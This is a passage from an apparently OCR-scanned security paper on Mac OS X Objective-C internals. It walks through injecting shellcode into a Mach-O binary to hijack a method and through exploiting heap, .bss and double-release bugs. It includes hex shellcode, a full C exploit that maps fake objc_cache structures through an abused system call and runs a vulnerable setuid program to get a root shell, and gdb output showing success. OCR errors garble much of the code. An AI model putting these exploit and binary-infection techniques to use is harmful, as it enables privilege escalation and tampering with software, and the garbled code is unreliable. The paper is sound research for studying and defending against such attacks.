This will be the parasite code, our poor little HelloWorld project will be 
the host. 


The first step in our infection process is to locate a little slab of space 
in the file where we can stick our code. Our code is around 30 bytes in 
length, so we’1ll need around 36 bytes in order to call the old address as 
well and complete the hook. 


Looking at the first two sections in our OBJC segment, the first has an 
offset of 8192 and a size of 0x30 the second has an offset of 8256. 


Section 
sectname __class 
segname __OBJC 
addr 0x00003000 
size 0x00000030 
offset 8192 
align 2%5 (32) 
reloff 0 
nreloc 0 
flags 0x00000000 
reservedl 0 
reserved2 0 
Section 
sectname __meta_class 
segname __OBJC 
addr 0x00003040 
size 0x00000030 
offset 8256 
align 2%5 (32) 
reloff 0 
nreloc 0 
flags 0x00000000 
reservedl 0 
reserved2 0 


If we do the math on the first part: 


>>> 8192 + 0x30 
8240 


This means there’s 16 bytes of padding in the file that we can use to store 
our code. If needed, however since our code is quite a bit bigger than 
this it would be painful to squeeze it into the padding here. 


Fortunately we can utilize the OBJC.__image_info section. There is a 
tone of padding straight after this section. 
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Section 
sectname __image_info 
segname __OBJC 
addr 0x000030c8 
size 0x00000008 
offset 8392 
align 2%2 (4) 
reloff 0 
nreloc 0 
flags 0x00000000 
reservedl 0 
reserved2 0 


So this is where we can store our code. 
But first, we need to increase the size of this section in the header. 
We can do this using HTE [20]. 


ARE SECEDO. fee 


section name __image_info 
segment name __OBJC 
virtual address 000030c8 
virtual size 00000008 
file offset 000020c8 
alignment 00000002 
relocation file offset 00000000 
number of relocation entries 00000000 
flags 00000000 
reservedl 00000000 
reserved2 00000000 


We simply press the f4 key to edit this once we’re in Mach-O header mod 


ARE SSCELON. fees 


section name __image_info 
segment name __OBJC 
virtual address 000030c8 
virtual size 00000030 
file offset 000020c8 
alignment 00000002 
relocation file offset 00000000 
number of relocation entries 00000000 
flags 00000000 
reservedl 00000000 
reserved2 00000000 


Once this is done we save our file, and return to hex edit mode. 

In hex view we press £5, and type in our file offset. 0x20c8. 

Once our cursor is at this position we move to the right 8 bytes, and then 
press £4 to enter edit mode. Then we paste our string of bytes: 


31c06a0aeb0850b00450cd80eb1Oe8F£3fFFFLF696C€666563746564210a00cC 
Then we save our file and run it. 


000020c0 ec 1f 00 00 c9 1£ 00 00-00 00 00 00 00 00 00 00 |?? ?? 

000020d0 31 cO 6a Oa eb 08 50 bO-04 50 cd 80 eb 10 e8 £3 | 

000020e0 ff ff FF 69 be 66 65 63-74 65 64 21 Oa 00 cc 00 |???infected!? ? 
000020f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 O00 | 


By running this binary in gdb, we can stick a breakpoint on the main 
function and then call our shellcode in memory. 


Breakpoint 1, 0x00001f41 in main () 
(gdb) set Seip=0x30d0 

(gdb) c 

Continuing. 

infected! 
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Program received signal SIGTRAP, Trace/breakpoint trap. 
0Ox000030ef in .objc_class_name_Talker () 


As you see our shellcod xecuted fine. However we have got a problem. 


—[dcbz@megatron:”~/code]$ ./hello 

objc[8268]: '/Users/dcbz/code/./hello’ has inconsistently-compiled 
Objective-C code. Please recompile all code in it. 

Hello World! 


The Objective-C runtime has ratted us out!! 


grep’ing the source code for this we can see the appropriate check: 


// Make sure every copy of objc_image_info in this image is the same. 


// This means same version and same bitwise contents. 
if (result->info) { 
const objc_image_info *start = result-—>info; 
const objc_image_info *end = 
(objc_image_info *) (info_size + (uint8_t *)start); 
const objc_image_info *info = start; 
while (info < end) { 
// version is byte size, except for version 0 


size_t struct_size = info->version; 
if (struct_size == 0) struct_size = 2 * sizeof (uint32_t); 
if (info->version != start->version || 

O != memcmp(info, start, struct_size) ) 


_objc_inform("’%Ss’ has inconsistently-compiled Objectiv 


"code. Please recompile all code in it.", 
_nameForHeader (header) ); 


} 


info = (objc_image_info *) (struct_size + (uint8_t *)info); 


The way I got around this at the moment was to change the name of the 
section from __imagine_info to __lmage_info. Honestly I don’t even 
understand why this section exists, but it works fine this way. 


SARE CSECELONAT, “EAR 


section name __ilmage_info 
segment name __OBJC 
virtual address 000030c8 
virtual size 00000030 
file offset 000020c8 
alignment 00000002 
relocation file offset 00000000 
number of relocation entries 00000000 
flags 00000000 
reservedl 00000000 
reserved2 00000000 


So now our shellcode is in memory, we need to gain control of execution 
somehow. 


The __inst_meth section contains a pointer to each of our methods. The way 
I plan to gain control of execution is to modify the pointer to our "say:" 


method with a pointer to our shellcode. 


Section 
sectname __inst_meth 
segname __OBJC 
addr 0x00003070 
size 0x00000014 
offset 8304 
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align 2%2 (4) 
reloff 0 
nreloc 0 
flags 0x00000000 
reservedl 0 
reserved2 0 


To test our theory out, we can first seek to the __inst_meth section in 
HTE... 
00002070 00 00 00 00 01 00 00 00-dd 1f 00 00 d5 1f 00 OO | ? 2? 22 


00002080[2a 1£ 00 00]07 00 00 00-10 00 00 00 bf 1£f 00 00 |*? ? 2 2? 
00002090 a4 30 00 00 07 00 00 00-10 00 00 00 bf 1£ 00 00 |?0 ? ? 2? 
000020a0 30 20 00 00 00 00 00 00-00 00 00 00 01 00 00 00 |0 ? 


And change our pointer to Oxdeadbeef as so: 
00002070 00 00 00 00 01 00 00 00-dd 1f 00 00 d5 1f 00 O00 | ? 22 22 
00002080[ef be ad de]07 00 00 00-10 00 00 00 bf 1f 00 00 |????? ? 2? 
00002090 a4 30 00 00 07 00 00 00-10 00 00 00 bf 1f 00 00 |?0 ? ? 2? 
000020a0 30 20 00 00 00 00 00 00-00 00 00 00 01 00 00 00 |0 ? 


This way when we start up our application and test it... 


(gdb) r 
Starting program: /Users/dcbz/code/hello 
Reading symbols for shared libraries Patibiee owe. Sevte, Beg patands Nati Gbs. Sricvawawaste done 


Program received signal EXC_BAD_ACCESS, Could not access memory. 
Reason: KERN_INVALID_ADDRESS at address: Oxdeadbeef 

Oxdeadbeef in ?? () 

(gdb) 


we can see that execution control is pretty straight forward. 


Now if we change this value from Oxdeadbeef to the address of our shellcode 
in the __lmage_info section. (0x30c8) and run the binary, we can see the 
results. 


—[dcbz@megatron:~/code]$ ./hello 
infected! 
Trace/BPT trap 


As you can see, we have successfully gained control of execution and 
executed our shellcode, however the SIGTRAP caused by the int3 in our code 
isn’t very inconspicuous. In order to fix this we’1l need to add some code 
to jump back to the previous value of our method. The following 
instructions take care of this nicely: 


nasm > mov ecx, 0Oxdeadbeef 


00000000 B9EFBEADDE mov ecx, Oxdeadbeef 
nasm > jmp ecx 
00000000 FFEL jmp ecx 


Another thing we need to take care of before resuming execution is 
restoring the stack and registers to their previous state. This way when 
we resume execution it will be like our code never executed. 


The final version of our payload looks something like: 


BITS 32 

SECTION .text 

_main: 
pusha 
xor eax,eax 
push byte Oxa 
jmp short down 


up: 
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push eax 
mov al, 0x04 
push eax ; fake 
int 0x80 
jmp short end 
down: 
call up 
db "infected!",0x0a, 0x00 
end: 


If we assembly it, 
Ox1lf2a the code looks 


push byte 16 


pop eax 
add esp,eax 

popa 

mov ecx, Oxdeadbeef 
jmp eCcx 


and change Oxdeadbeef to the address of our old function 
like this. 


6031c06a0aebO0850b00450cd80eb1Oe8£3FEFLELL696C666563746564210a006a105801c4 
61b92al1f0000ffel 


We inject this into our 


000020c0 


binary using hte again... 


ec 1f 00 00 c9 1f 00 00-60 31 cO 6a Oa eb 08 50 


000020d0 bO 04 50 cd 80 eb 10 e8-f£3 ££ ff FF 69 be 66 65 
000020e0 63 74 65 64 21 Oa 00 6a-10 58 01 c4 61 b9 2a 1f 
000020f0 00 00 ££ el 00 00 00 00-00 00 00 00 00 00 00 00 


and run the binary. 


-[dcbz@megatron:~/code]$ 
infected! 
Hello World! 


Presto! 


./hello 


Our binary is infected. I’m not going to bother implementing this 


in assembly right now, but it would be easy enough to do. 


--[ 


5 -— Exploiting Objective-C Applications 


Hopefully at this stage you’re fairly familiar with the Objective-C 
runtime. In this section 
exploiting an Objective-C application on Mac OS X. 


In order to explore this, 


an object allocation (all 


we’ll look at some of the considerations of 


we’ll first start by looking at what happens when 
oc method) occurs for an Objective-C class. 


So basically, when the alloc method is called ([Object alloc]) the 
_internal_class_creatInstanceFromZone function is called in the Objective-C 
runtime. The source code 


for this function is shown below. 


[BORK RR KKK KK KR I I I I I I OR IK OK KK 


* ~internal_class_createInstanceFromZone. Allocate an instance of the 


* specified cl 


ass with the specified number of bytes for indexed 


* variables, in the specified zone. The isa field is set to the 


* class, C default constructors are called, and all other fields are zeroed. 
OK KR I I I A I I I OR RK / 


__private_extern__ id 


_internal_cl 


{ 


id obj; 
size_t size; 


lass_createInstanceFromZone (Class cls, size_t extraBytes, 


void *zone) 


// Can't create something for nothing 


if (!cls) return nil; 


// Allocate and initialize 
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size = _class_getInstanceSize(cls) + extraBytes; 
if (UseGC) { 
obj = (id) auto_zone_allocate_object (gc_zone, size, 


AUTO_OBJECT_SCANNED, false, true); 


} else if (zone) 
obj = (id) malloc_zone_calloc (zone, 1, size); 
} else { 
obj = (id) calloc(1l, size); 
} 
if ('!obj) return nil; 


// Set the isa pointer 
obj->isa = cls; 


// Call C++ constructors, if any. 
if (!object_cxxConstruct (obj)) { 
// Some C++ constructor threw an exception. 
if (UseGC) { 
auto_zone_retain(gc_zone, obj); 
hk GE £E xpects retain count==1 


} 
free (obj); 
return nil; 


return obj; 


As you can see, this function basically just looks up the size of the class 
and uses calloc to allocate some (zero filled) memory for it on the heap. 


From the code above we can see that the calls to calloc etc allocate memory 
from the default malloc zone. This means that the class meta-data and 
contents are stored in amongst any other allocations the program makes. 
Therefore, any overflows on the heap in an objc application are liable 

to end up overflowing into objc meta-data. We can utilize this to gain 
control of execution. 


[BORK RR KKK KK KR I I I I OR I RK KK 


* _objc_internal_zone. 
* Malloc zone for internal runtime data. 
* By default this is the default malloc zone, but a dedicated zone is 


* used if environment variable OBJC_USE_INTERNAL_ ZONE is set. 
FAK I I I I AR RK OK / 


However, if you set the OBJC_USE_INTERNAL_ZONE environment variable before 
running the application, the Objective-C runtime will use it’s own malloc 
zone. This means the objc meta-data will be stored in another mapping, and 
will stop these attacks. This is probably worth doing for any services you 
run regularly (written in objective-c) just to mix up the address space a 
bit. 


The first thing we’11 look at, in regards to this process, is how the class 
size is calculated. This will determine which region on the heap this 
allocation takes place from. (Tiny/Small/Large/Huge). For more information 
on how the userspace heap implementation (Bertrand’s malloc) works, you can 
check my heap exploitation techniques paper [11].] 


As you saw in the code above, when th 
_internal_class_createInstanceFromZone function wants to determine the siz 
of a class, the first step it takes is to call the _class_getInstanceSize() 
function. 


This basically just looks up the instance_size attribute from inside our 
class struct. This means we can easily predict which region of the heap our 
particular object will reside. 


Ok, so now we’re familiar with how the object is allocated we can explor 
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this in memory. 


The first step is to copy the HelloWorld sample application we mad arlier 
to ofexl as so... 


—[dcbz@megatron:~/code]$ cp -r HelloWorld/ ofex1l 


We can then modify the hello.c file to perform an allocation with malloc () 
prior to the class being alloc’ed. 


The code then uses strcpy() to copy the first argument to this program into 
our small buffer on the heap. With a large argument this should overflow 
into our objective-c object. 


include <stdio.h> 
include <stdlib.h> 
import "Talker.h" 


int main(int ac, char **av) 


char *buf = malloc(25); 
Talker *talker = [[Talker alloc] init]; 
printf ("buf: Ox%x\n",buf); 
printf ("talker: Ox%x\n",talker); 
if(ac != 2) { 
exit(1); 


} 

strcpy (buf,av[1]); 

[talker say: "Hello World!"]; 
[talker release]; 


} 


Now if we recompile our sample code, and fire up gdb, passing in a long 
argument, we can begin to investigate what’s needed to gain control of 
execution. 


(gdb) r ‘perl -e’print "A"x5000’ * 

Starting program: /Users/dcbz/code/ofexl/build/hello ‘perl -e’print 
"A"X50007 \ 

buf: 0x103220 

talker: 0x103260 


Program received signal EXC_BAD_ACCESS, Could not access memory. 
Reason: KERN_INVALID_ADDRESS at address: 0x41414161 
0x9470d688 in objc_msgSend () 


As you can see from the output above, buf is 64 bytes lower on the heap 
than talker. This means overflowing 68 bytes will overwrite the isa pointer 
in our class struct. 


This time we run the program again, however we stick Oxcafebabe where our 
isa pointer should be. 


(gdb) r ‘perl -e’print "A"x64,"\xbe\xba\xfe\xca"’ * 

The program being debugged has been started already. 

Start it from the beginning? (y or n) y 

Starting program: /Users/dcbz/code/ofexl/build/hello ‘perl -e’print 
"A"x64,"\xbe\xba\xfe\xca"’ * 

buf: 0x1032c0 

talker: 0x103300 


Program received signal EXC_BAD_ACCESS, Could not access memory. 
Reason: KERN_INVALID_ADDRESS at address: Oxcafebade 

0x9470d688 in objc_msgSend () 

(gdb) x/i Spc 

0x9470d688 <objc_msgSend+24>: mov edi,DWORD PTR [edx+0x20] 
(gdb) i r edx 

edx Oxcafebabe —889275714 
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We have now controlled the ISA pointer and a crash has occured offsetting 
this by 0x20 and reading. However, we’re unsure at this stage what exactly 
is going on here. 


In order to explore this, let’s take a look at the source code for 
objc_msgSend again. 


// load receiver and selector 


movl selector(%esp), %ecx 
movl self(%sesp), %eax 


// check whether selector is ignored 


cmpl S$ kIgnore, %ecx 
je LMsgSendDone // return self from %eax 


// check whether receiver is nil 


testl Seax, teax 
je LMsgSendNilSelf 


// receiver (in %eax) is non-nil: search the cache 


LMsgSendReceiverOk: 
// -( nemo )- :: move our overwritten ISA pointer to edx. 
movl isa(%eax), %edx // class = self->isa 
// -( nemo )- :: This is where our crash takes place. 


// in the CachLookup macro. 
CacheLookup WORD_RETURN, MSG_SEND, LMsgSendCacheMiss 


movl SkFwdMsgSend, %edx // flag word-return for _objc_msgForward 
jmp *Seax // goto *imp 


From the code above we can determine that our crash took place within the 
CacheLookup macro. This means in order to gain control of execution from 
here we’re going to need a little understanding of how method caching works 
for Objective-C classes. 


Let’s start by taking a look at our objc_class struct again. 


struct objc_class 
{ 
struct objc_class* isa; 
struct objc_class* super_class; 
const char* name; 
long version; 
long info; 
long instance_size; 
struct objc_ivar_list* ivars; 
struct objc_method_list** methodLists; 
struct objc_cache* cache; 
struct objc_protocol_list* protocols; 


}; 


We can see above that 32 bytes (0x20) into our struct is the cache pointer 
(a pointer to a struct objc_cache instance). Therefore the instruction that 
our crash took place in, is derefing the isa pointer (that we overwrote) 
and trying to access the cache attribute of this struct. 


Before we get into how the CacheLookup macro works, lets quickly 
familiarize ourselves with how the objc_cache struct looks. 


struct objc_cache { 
unsigned int mask; /* total = mask + 1 */ 
unsigned int occupied; 
cache_entry *buckets[1]; 

}; 


The two elements we’re most concerned about are the mask and buckets. The 
mask is used to resolve an index into the buckets array. I’1l go into that 
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process in more detail as we read the implementation of this. The buckets 
array is made up of cache_entry structs (shown below). 


typedef struct { 

SEL name; // same layout as struct old_method 
void *unused; 

IMP imp; // same layout as struct old_method 

} cache_entry; 


Now let’s step through the CachLookup source now and we can look at the 
process of checking the cache and what we control with an overflow. 


-macro CacheLookup 


// load variables and save caller registers. 


pushl Sedi // save scratch register 
movl cache (%edx), %edi // cache = class->cache 
pushl Sesi // save scratch register 


This initial load into edi is where our bad access is performed. We ar 
able to control edx here (the isa pointer) and therefore control edi. 


movl mask(%edi), %esi // mask = cache->mask 


First the cache struct is dereferenced and the "mask" is moved into esi. 
We control the outcome of this, and therefore control the mask. 


leal buckets (%edi), %edi // buckets = &cache->buckets 


The address of the buckets array is moved into edi with lea. This will come 
straight after our mask and occupied fields in our fake objc_cache struct. 


movl ’ecx, %edx // index = selector 
shrl $$2, %edx // index = selector >> 2 


The address of the selector (c string) which was passed to objc_msgSend() 
as the method name is then moved into ecx. We do not control this at all. 
I mentioned earlier that selectors are basically c strings that have been 
registered with the runtime. The process we are looking at now, is used to 
turn the Selector’s address into an index into the buckets array. This 
allows for quick location of our method. As you can s above, the first 
step of this is to shift the pointer right by 2. 


andl esi, %edx // index &= mask 
movl (sedi, %edx, 4), %eax // method = buckets [index] 


Next the mask is applied. Typically the mask is set to a small value 
in order to reduce our index down to a reasonable size. Since we control 
the mask, we can control this process quite effectively. 


Once the index is determined it is used in conjunction with the base 
address of the buckets array in order to move one of the bucket entries 
into eax. 


testl Seax, %eax // check for end of bucket 
je LMsgSendCacheMiss_$0_$1_$2 // go to cache miss code 


If the bucket does not exist, it is assumed that a CacheMiss was performed, 
and the method is resolved manually using the technique we described early 
on in this paper. 


cmp1 method_name (%eax), %ecx // check for method name match 
je LMsgSendCacheHit_$0_$1_$2 // go handle cache hit 


However if the bucket is non-zero, the first element is retrieved which 
should be the same selector that was passed in. If that is the cache, then 
it is assumed that we’ve found our IMP function pointer, and it is called. 
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addl S$1, %edx // bump index 
jmp LMsgSendProbeCache_$0_$1_$2 // ... and loop 


Otherwise, the index is incremented and the whole process is attempted 
again until a NULL bucket is found or a CacheHit occurs. 


Ok, so taking this all home, lets apply what we know to our vulnerable 
sample application. 


We’ve accomplished step #1, we’ve overflown and controlled the isa pointer. 
The next thing we need to do is find a nice patch of memory where we can 
position our fake objective-c class information and predict it’s address. 


There are many different techniques for this and almost all of them are 
Situational. For a remote attack, you may wish to spray the heap, filling 
all the gaps in until you can predict what’s at a static location. However 
in the case of a local overflow, the most reliable technique I know I wrote 
a 
S 


bout in my "a XNU Hope" paper [13]. Basically the undocumented system call 
YS_shared_region_map_file_np is used to map portions of a file into a 
shared mapping across all the processes on the system. Unfortunately after 
I published that paper, Apple decided to add a check to the system call to 
make sure that the file being mapped was owned by root. KF originally 
pointed this out to me when leopard was first released, and my macbook was 
lying broken under my bed. He also noted, that there were many root owned 
writable files on the system generally and so he could bypass this quite 
easily. 


—[dcbz@megatron:~]$ ls -lsa /Applications/.localized 
8 -rw-rw-r-- 1 root admin 8 Apr 11 19:54 /Applications/.localized 


An example of this is the /Applications/.localized file. This is at least 
writeable by the admin user, and therefore will serve our purpose in this 
case. However I have added a section to this paper (5.1) which demonstrates 
a generic technique for reimplementing this technique on Leopard. I got 
sidetracked while writing this paper and had to figure it out. 


For now we’1ll just use /Applications/.localized however, in order to reduce 
the complexity of our example. 


Ok so now we know where we want to write our data, but we need to work out 
exactly what to write. The lame ascii diagram below hopefully demonstrates 
my idea for what to write. 


mask=0 <=; 
occupied 
= buckets 
'’-->| fake bucket: SEL 
fake bucket: unused 
fake bucket: IMP == |-> 


ISA+32> cache pointer cas 


SHELLCODE <---- 


So basically what will happen, the ISA will be dereferenced and 32 will be 
added to retrieve the cache pointer which we control. The cache pointer 
will then point back to our first address where the mask value will be 
retrieved. I used the value 0x0 for the mask, this way regardless of the 
value of the selector the end result for the index will be 0. This way we 
can stick the pointer from the selector we want to support (taken from ecx 
in objc_msgSend.) at this position, and force a match. This will result in 
the IMP being called. We point the imp at our shellcode below our cache 
pointer and gain control of execution. 
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Phew, glad that explanation is out of the way, now to show it in code, 
which is much much easier to understand. Before we begin to actually write 
the code though, we need to retrieve the value of the selector, so we can 
use it in our code. 


In order to do this, we stick a breakpoint on our objc_msgSend() call in 
gdb and run the program again. 


(gdb) break *0x00001f83 

Breakpoint 1 at 0x1f83 

(gdb) r AAAAAAAAAAAAAAAAAAAAA 

Starting program: /Users/dcbz/code/ofexl/build/hello AAAAAAAAAAAAAAAAAAAAA 
buf: 0x103230 

talker: 0x103270 


Breakpoint 1, 0x00001f83 in main () 
(gdb) x/i Spc 


Ox1lf£83 <main+194>: call 0x400a <dyld_stub_objc_msgSend> 
(gdb) stepi 

0x0000400a in dyld_stub_objc_msgSend () 

(gdb) 

0x94e0c670 in objc_msgSend () 

(gdb) 

0x94e0c674 in objc_msgSend () 

(gdb) s 


0x94e0c678 in objc_msgSend () 
(gdb) x/s $ecx 
Oxlfb6 <maint+245>: "say:" 


As you can see, the address of our selector is Oxlfb6é. 


(gdb) info share Secx 
2 hello — 0x1000 exec Y Y 
/Users/dcbz/code/ofexl/build/hello (offset 0x0) 


If we get some information on the mapping this came from we can see it was 
directly from our binary itself. This address is going to be static each 
time we run it, so it’s acceptable to use this way. 


Ok now that we’ve got all our information intact, I’1ll walk through a 
finished exploit for this. 


nclude <stdio.h> 

nclude <stdlib.h> 

nclude <fcntl.h> 

nclude <sys/syscall.h> 

nclude <sys/types.h> 

nclude <mach/vm_prot.h> 

nclude <mach/i386/vm_types.h> 

nclude <mach/shared_memory_server.h> 
nclude <string.h> 

nclude <unistd.h> 


ee ee 


define BASE_ADDR O0x9ffff000 
define PAGESIZE 0x1000 
define SYS_shared_region_map_file_np 295 


EJ 


We’ re going to map our data, at the page O0x9ffff000-0xa0000000 this way 
we’re guaranteed that we’ll have an address free of NULL bytes. 


char nemox86exec[] = 

// x86 execve() code / nemo 
"\x31\xc0\x50\xb0\xb7\x6a\x7£\xcd" 
"\x80\x31\xc0\x50\xb0\x17\x6a\x7£" 
"\xcd\x80\x31\xc0\x50\x68\x2£\x2£" 
"\x73\x68\x68\x2£\x62\x69\x6e\x89" 
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"\xe3\x50\x54\x54\x53\x53\xb0\x3b" 
"\xcd\x80"; 


I’m using some simple execve("/bin/sh") shellcode for this. But obviously 
this is just for local vulns. 


struct _shared_region_mapping_np { 


mach_vm_address_t address; 

mach_vm_size_t size; 

mach_vm_offset_t file_offset; 

vm_prot_t max_prot; /* rvread/write/execute/COW/ZF */ 
vm_prot_t init_prot; /* read/write/execute/COW/ZF */ 


}; 


struct cache_entry { 


char *name; // same layout as struct old_method 
void *unused; 
void (*imp) (); // same layout as struct old_method 


}; 


struct objc_cache { 
unsigned int mask; /* total = mask + 1 */ 
unsigned int occupied; 
struct cache_entry *buckets[1]; 


}; 


struct our_fake_stuff { 
struct objc_cache fake_cache; 
char filler[32 - sizeof(struct objc_cache) ]; 
struct objc_cache *fake_cache_ptr; 


}; 


We define our structs here. I created a "our_fake_stuff" struct in order to 
hold the main body of our exploit. I guess I should have stuck the 
objc_cache struct we’re using in here. But I’m not going to go back and 
change it now... ;p 


define ROOTFILE "/Applications/.localized" 


This is the file which we’re using to store our data before we load it into 
the shared section. 


int main(int ac, char **av) 
{ 
int fd; 
struct _shared_region_mapping_np sr; 
char data[PAGESIZE]; 
char *ptr = data + PAGESIZE sizeof (nemox86exec) sizeof (struct our_fake_stuff) - 
sizeof (struct objc_cache) ; 
long knownaddress; 
struct our_fake_stuff ofs; 
struct cache_entry bckt; 
define EVILSIZE 69 


char badbuff [EVILSIZE]; 
char *args[] = {"./build/hello", badbuff, NULL}; 
char *env[] = {"TERM=xterm", NULL}; 


So basically I create a char[] buff PAGESIZE in size where I store 
everything I want to map into the shared section. Then I write the whole 
thing to a file. args and env are used when I execve the vulnerabl 
program. 


El 


printf("{+] Opening root owned file: %s.\n", ROOTFILE) ; 
if ( (fd=open (ROOTFILE, O_RDWR|O_CREAT) ) ==-1) 


{ 


perror ("open"); 
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exit (EXIT_FAILURE) ; 


[| 


} 


I open the root owned file... 


// £111 our data buffer with nops. Why? Why not! 
memset (data,’\x90’, sizeof (data) ); 


knownaddress = BASE ADDR + PAGESIZE sizeof (nemox8 6exec) 
sizeof (struct our_fake_stuff) - sizeof(struct objc_cache) ; 


knownaddress is a pointer to the start of our data. We position all our 
data towards the end of the mapping to reduce the chance of NULL bytes. 


ofs.fake_cache.mask 0x0; // mask = 0 
ofs.fake_cache.occupied Oxcafebabe; // occupied 
ofs.fake_cache.buckets[0] = knownaddress + sizeof(ofs); 


The ofs struct is set up according to the method documented above. The mask 
is set to 0, so that our index ends up becoming 0. Occupied can be any 
value, I set it to Oxcafebabe for fun. Our buckets pointer basically just 
points straight after itself. This is where our cache_entry struct is going 
to be stored. 


bckt.name = (char *)Oxlfb6; // our SEL 
bckt.unused = (void *)O0xbeef; // unused 
bekt.imp = (void (*) ()) (knownaddress + 


sizeof (struct our_fake_stuff) + 
sizeof(struct objc_cache)); // our shellcode 


Now we set up the cache_entry struct. Name is set to our selector value 
which we noted down earlier. Unused can be set to anything. Finally imp is 
set to the end of both of our structs. This function pointer will be called 
by the objective-c runtime, after our structs are processed. 


// set our filler to "A", who cares. 
memset (ofs.filler,’\x41’,sizeof(ofs.filler)); 
ofs.fake_cache_ptr = (struct objc_cache *) knownaddress; 


Next, we fill our filler with "A", this can be anything, it’s just a pad so 
that our fake_cache_ptr will be 32 bytes from the start of our ISA struct. 
Our fake_cache_ptr is set up to point back to the start of our data 
(knownaddress). This way our fake_cache struct is processed by the runtime. 


// stick our struct in data. 

memcpy (ptr, &ofs, sizeof (ofs)); 

// stick our cache entry after that 

memcpy (ptr+sizeof (ofs),&bckt, sizeof (bckt) ); 

// stick our shellcode after our struct in data. 
memcpy (ptr+sizeof (ofs)+sizeof (bckt) ,nemox86exec 
, sizeof (nemox86exec) ); 


Now that our structs are set up, we simply memcpy() each of them into the 
appropriate position within the data[] blob.... 


printf£("[+] Writing out data to file.\n"); 
if (write (fd,data,PAGESIZE) != PAGESIZE) 
{ 


perror ("write"); 
exit (EXIT_FAILURE) ; 


} 


And write this out to our file. 


sr.address = BASE_ADDR; 
sr.size ESIZE; 
sr.file_offset 
sr.max_prot = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE; 


|; 
o'U 
~~ oD 
i) 
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sr.init_prot = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE; 
printf("({+] Mapping file to shared region.\n"); 
if (syscall (SYS_shared_region_map_file_np, fd,1,&sr,NULL) ==-1) 


{ 
perror("shared_region_map_file_np"); 
exit (EXIT_FAILURE) ; 


close (fd); 


Our file is then mapped into the shared region, and our fd discarded. 


printf("{+] Fake Objective-C chunk at: Ox%x.\n", knownaddress) ; 
memset (badbuff,’\x41’,sizeof (badbuff) ); 
//knownaddress = Oxcafebabe; 
badbuff [sizeof (badbuff) - 1] = 0x0; 
badbuff [sizeof (badbuff) - 2] = (knownaddress & Oxff000000) >> 24; 
badbuff [sizeof (badbuff) - 3] = (knownaddress & Ox00ff0000) >> 16; 
badbuff [sizeof (badbuff) - 4] = (knownaddress & Ox0000ff00) >> 8; 
badbuff [sizeof (badbuff) - 5] = (knownaddress & Ox000000ff) >> 0; 
printf£("({+] Executing vulnerable app.\n"); 

Before finally we set up our badbuff, which will be argv[1] within our 


vulnerable application. knownaddress (The address of our data now stored 
within the shared region.) is used as the ISA pointer. 


execve (*args,args,env) ; 


// not reached. 
exit (0); 
} 


For your convenience I will include a copy of this exploit/vuln along with 
most of the other code in this paper, uuencoded at the end. 


As you can see from the following output, running our exploit works as 
xpected. We’re dropped to a shell. (NOTE: I chown root;chmod +s’ed the 
build/hello file for effect.) 


—[dcbz@megatron:~ /code/ofex1]$ ./exploit 
[+] Opening root owned file: /Applications/.localized. 
[+] Writing out data to file. 
[4 
[ 


+] Mapping file to shared region. 

Fake Objective-C chunk at: Ox9fffffa5d. 
[+] Executing vulnerable app. 

buf: 0x103500 

talker: 0x103540 

bash-3.2# id 

uid=0 (root) 


Hopefully in this section I have provided a viable method of exploiting 
heap overflows in an Objective-c Environment. 


Another technique revolving around overflowing Objective-C meta-data is an 
overflow on the .bss section. This section is used to store static/global 
data that is initially zero filled. 


Generally with the way gcc lays out the binary, the __class section comes 
straight after the .bss section. This means that a largish overflow on the 
-bss will end up overwriting the isa class definition structs, rather than 
the instantiated classes themselves, as in the previous example. 


In order to test out what will happen we can modify our previous example to 
move buf from the heap to the .bss. I also changed the printf responsible 


4.txt Wed Apr 26 09:43:46 2017 45 


for printing the address of the Talker class, to deref the first element 
and print the address of it’s isa instead. 


include <stdio.h> 
include <stdlib.h> 
import "Talker.h" 


char buf[25]; 


int main(int ac, char **av) 
{ 
Talker *talker = [[Talker alloc] init]; 
printf ("buf: Ox%x\n",buf); 
printf ("talker isa: 0x%x\n",* (long *)talker); 
if(ac != 2) { 
exit(1); 


} 

strcpy (buf,av[1]); 

[talker say: "Hello World!"]; 
[talker release]; 


} 


When we compile this and run it in gdb, we can see a couple of things. 
Firstly, that the talkers isa struct is only around 4096 bytes apart from 
our buffer. 


(gdb) r ‘perl -e’print "A"x4150’ * 

Starting program: /Users/dcbz/code/ofex2/build/hello ‘perl -e’print 
"A"YX4150" N 

Reading symbols for shared libraries ++++tt+...............220206- done 
buf: 0x2040 

talker isa: 0x3000 


We also get a crash in the following instruction: 


Program received signal EXC_BAD_ACCESS, Could not access memory. 
Reason: KERN_INVALID_ADDRESS at address: 0x41414141 

Ox94e0c68c in objc_msgSend () 

(gdb) x/i Spc 


Ox94e0c68c <objc_msgSend+28>: mov 0x0 (Sedi), Sesi 
(gdb) i r edi 
edi 0x41414141 1094795585 


This instruction looks pretty familiar from our previous example. 

As you can guess, this instruction is looking up the cache pointer, exactly 
the same as our previous example. The only real difference is that we’re 
skipping a step. Rather than overflowing the ISA pointer and then creating 
a fake ISA struct, we simply have to create a fake cache in order to gain 
control of execution. 


I’m not going to bother playing this one out for you guys in the paper, 
cause this monster is already getting quite long as it is. I’11 include the 
sample code in the uuencoded section at the end though, feel free to play 
with it. 


As you can imagine, you simply need to set up memory as such: 


mask=0 
occupied 
=== buckets 
'-->| fake bucket: SEL 
fake bucket: unused 
fake bucket: IMP —= |----- ” 
SHELLCODE <----! 


and point edi to the start of it to gain control of execution. 
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These two techniques provide some of the easiest ways to gain control of 
execution from a heap or .bss overflow that i’ve seen on Mac OS X. 


he last type of bug which I will explore in this paper, is the double 
"release". This is a double free of an Objective-C object. 


he following code demonstrates this situation. 


include <stdio.h> 
include <stdlib.h> 
import "Talker.h" 


int main(int ac, char **av) 
{ 
Talker *talker = [[Talker alloc] init]; 
printf ("talker: Ox%x\n",talker) ; 
printf ("Talker is: %i bytes.\n", sizeof (Talker) ); 
if(ac != 2) { 
exit(1); 


} 

char *buf = strdup(av[1]); 

printf ("buf @ O0x%x\n",buf) ; 

[talker say: "Hello World!"]; 

[talker release]; // Free 

[talker release]; // Free again... 


} 


If we compile and execute this code in gdb, the following situation occurs: 


—[dcbz@megatron:~ /code/p66-objc/ofex3]$ gcc Talker.m hello.m 
-framework Foundation -o hello 
—[dcbz@megatron:~/code/p66-objc/ofex3]$ gdb ./hello 

GNU gdb 6.3.50-20050815 (Apple version gdb-768) 

Copyright 2004 Free Software Foundation, Inc. 


(gdb) r AA 

